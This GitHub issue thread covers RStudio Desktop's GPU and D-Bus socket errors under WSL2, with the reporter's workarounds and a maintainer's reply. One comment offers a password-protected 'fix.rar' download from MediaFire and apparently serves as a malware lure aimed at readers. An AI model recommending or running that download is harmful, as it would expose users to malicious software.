### ISSUE TITLE
rstudio desktop d-bus error on wsl2

### ISSUE THREAD

**Issue by karJac** [rstudio/rstudio#15091]
### System details
    CPU/iGPU        : AMD Ryzen 7 7840U / Radeon 780M Graphics
    RStudio Edition : Desktop
    RStudio Version : 2024.04.2 
    OS Version.     : windows 11 Pro / ubuntu 22.04.3 WSL2
    R Version       : 4.4.1

### Steps to reproduce the problem

**install R**
```
add this to /etc/apt/sources.lis
#this is for ubuntu 22
deb https://cloud.r-project.org/bin/linux/ubuntu jammy-cran40/ 
#add key by hand
wget -qO- https://cloud.r-project.org/bin/linux/ubuntu/marutter_pubkey.asc | sudo tee /etc/apt/trusted.gpg.d/cran_ubuntu_key.asc
source ~/.bashrc
sudo apt-get update
sudo apt-get install r-base
```

**install rstudio**
```
from https://posit.co/download/rstudio-desktop/
download:
rstudio-2024.04.2-764-amd64.deb
sudo apt-get update
sudo apt-get upgrade
sudo dpkg -i rstudio-2024.04.2-764-amd64.deb #it will fail
sudo apt-get install -f #installing dependencies
sudo dpkg -i rstudio-2024.04.2-764-amd64.deb #run it again
sudo apt-get install libasound2 libgbm1 libnss3
```

run rstudio

### Describe the problem in detail

**The first error encountered is:**
```
[12024:0827/012953.047744:ERROR:gl_factory.cc(120)] Requested GL implementation (gl=none,angle=none) not found in allowed implementations: [(gl=egl-angle,angle=default),(gl=egl-gles2,angle=none)].
[12024:0827/012953.050278:ERROR:viz_main_impl.cc(196)] Exiting GPU process due to errors during initialization
```

and can be fixed by:
`rstudio --use-gl=angle`

2 **the second problem is:**
`[10569:0827/004757.735915:ERROR:bus.cc(407)] Failed to connect to the bus: Failed to connect to socket /run/user/1000/bus: No such file or directory`

and can be fixed by adding these lines to `~/.bashrc`
```
if [ -z "$DBUS_SESSION_BUS_ADDRESS" ]; then
    dbus-daemon --session --address=unix:path=/run/user/1000/bus --fork
    export DBUS_SESSION_BUS_ADDRESS="unix:path=/run/user/1000/bus"
fi
```

The issue is that when running RStudio, it expects the socket to be located at a fixed path in /run/user/1000/bus, which doesn't work in WSL2 where the socket is instead created as an abstract socket and is found under /tmp
```
dbus-launch --sh-syntax --exit-with-session
DBUS_SESSION_BUS_ADDRESS='unix:abstract=**/tmp/dbuslADZpPMOKJ,guid=55593467f737024f5f2ed7c566cd08fd**';
export DBUS_SESSION_BUS_ADDRESS;
DBUS_SESSION_BUS_PID=11021;
DBUS_SESSION_BUS_WINDOWID=6291457;
```

### Describe the behavior you expected

Rstudio should just run utilizing GPU without errors

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ronblum** [comment]
@karJac Thank you for raising the issue!
1) For the first one, you can also switch to software rendering at `Tools -> Global Options -> General -> Advanced -> Rendering Engine`. Though I don't know which would better fit your needs, you solution or changing the rendering engine.
2) Unfortunately, we don't support WSL, so this isn't likely to be something that we address. I [found an issue](https://github.com/microsoft/WSL/issues/7915) about getting this error with Electron apps on WSL. RStudio Desktop is an Electron app, though I can't vouch for the workarounds in the bug report. Though I'm that you've made it work!
